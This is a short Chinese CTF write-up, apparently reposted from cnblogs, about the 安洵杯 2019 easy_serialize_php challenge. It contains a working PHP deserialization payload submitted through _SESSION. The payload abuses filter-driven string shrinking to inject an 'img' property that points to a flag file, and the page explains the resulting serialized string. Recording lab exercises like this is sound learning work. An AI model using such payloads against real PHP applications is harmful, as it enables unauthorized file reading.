码迷,mamicode.com
首页 > Web开发 > 详细

刷题记录:[安洵杯 2019]easy_serialize_php

时间:2020-01-14 09:20:32      阅读:279      评论:0      收藏:0      [点我收藏+]

标签:刷题记录   code   art   lis   刷题   payload   ESS   session   序列化   

刷题记录:[安洵杯 2019]easy_serialize_php

题目复现链接:https://buuoj.cn/challenges
参考链接:第二届安洵杯2019部分writeup

知识点

PHP反序列化

payload为_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
extract后覆盖了两个没用的属性,但是后面又强制加了一个我们不可控的img属性。这个payload的精妙之处就在于phpflag被替换为空后,$serialize_info的内容为
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
刚好把后面多余的img部分截断掉

刷题记录:[安洵杯 2019]easy_serialize_php

标签:刷题记录   code   art   lis   刷题   payload   ESS   session   序列化   

原文地址:https://www.cnblogs.com/20175211lyz/p/12190128.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!